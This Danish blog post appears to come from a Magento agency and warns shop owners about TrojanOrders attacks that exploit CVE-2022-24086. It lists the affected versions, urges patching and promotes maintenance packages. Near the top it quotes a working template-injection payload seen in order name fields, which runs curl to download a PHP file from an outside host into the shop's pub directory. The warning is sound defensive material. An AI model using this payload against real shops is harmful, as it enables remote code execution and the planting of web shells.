Vigtig Sikkerhedsopdatering: Beskyt Din Magento Mod TrojanOrders

Har du modtaget nogle mærkelige ordrer i din Magento? Ser navnet på ordren sådan her ud:
{{var this.getTemp%00lateFilter().filter(firstname)}} {{var this.getTemp%00lateFilter().add%00AfterFilterCallback(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://magdemo.io/cache.php?m=36403-49110-37491)}}

Så er det et tegn på at din shop er forsøgt udsat for hacker-angreb, der udnytter en sårbarhed i ældre versioner af Magento. Hvis du ser ordrer, hvor navne eller adresser indeholder usædvanlig kode som ovenstående, er det et klart tegn på, at nogen forsøger at udnytte sårbarheden i din webshop. 

I 2022 udgav Adobe en kritisk sikkerhedsopdatering til både Adobe Commerce og Magento Open Source, der adresserede en alvorlig sårbarhed identificeret som CVE-2022-24086. Adobe har også bekræftet, at denne sårbarhed allerede er blevet udnyttet i meget begrænsede angreb, hvor målgruppen har været Adobe Commerce forhandlere.

Hvad betyder dette for dig?

Hvis denne sårbarhed succesfuldt bliver udnyttet, giver den hackere mulighed for at udføre kode på din server, hvilket kan have katastrofale konsekvenser for din webshop, da det kan resultere i datatyveri, ændringer i indstillinger eller i værste fald total kontrol over din webshop.

Er min Magentoshop i fare?

Hvis din Magento kører på en version der er ældre end sikkerhedsopdateringen fra 2022, så er er stor sandsynlighed for at din Magento stadig er sårbar over for dette sikkerhedsproblem. Er du på en nyere version, bør du være beskyttet mod denne specifikke sårbarhed, men modtager du stadig suspekte ordrer, er der andre ting du kan foretage dig for at undgå at få en masse falske ordrer. 

Magentoversionerne der er påvirket er 2.4.3-p1 (og tidligere) og 2.3.7-p2 (og tidligere)

Sådan beskytter du din Magento webshop

Adobe anbefaler at du straks får installeret de 2 sikkerhedspatches der lukker sikkerhedshullet.  

Disse kan findes her 

Vores anbefaling 

Vi anbefaler kraftigt, at du gennemgår din nuværende version af Adobe Commerce eller Magento Open Source for at sikre, at den er opdateret. Hvis du stadig kører på en ældre version, bør du prioritere at installere sikkerhedsopdateringerne fra 2022 for at beskytte din butik mod potentielle angreb.

Generelt anbefaler vi at du løbende holder din Magento Webshop opdateret, og som minimum får installeret de sikkerhedsopdateringer der løbende udkommer. 

Hos vConnect tilbyder vi pakker til en fordelagtig månedlig pris, hvor vi sørger for, at din Magento webshop altid er opdateret og dermed i sikre hænder. Hvis du gerne vil høre mere om dette, så kan du skrive til os her 

 

Forfatter Melissa Djurslev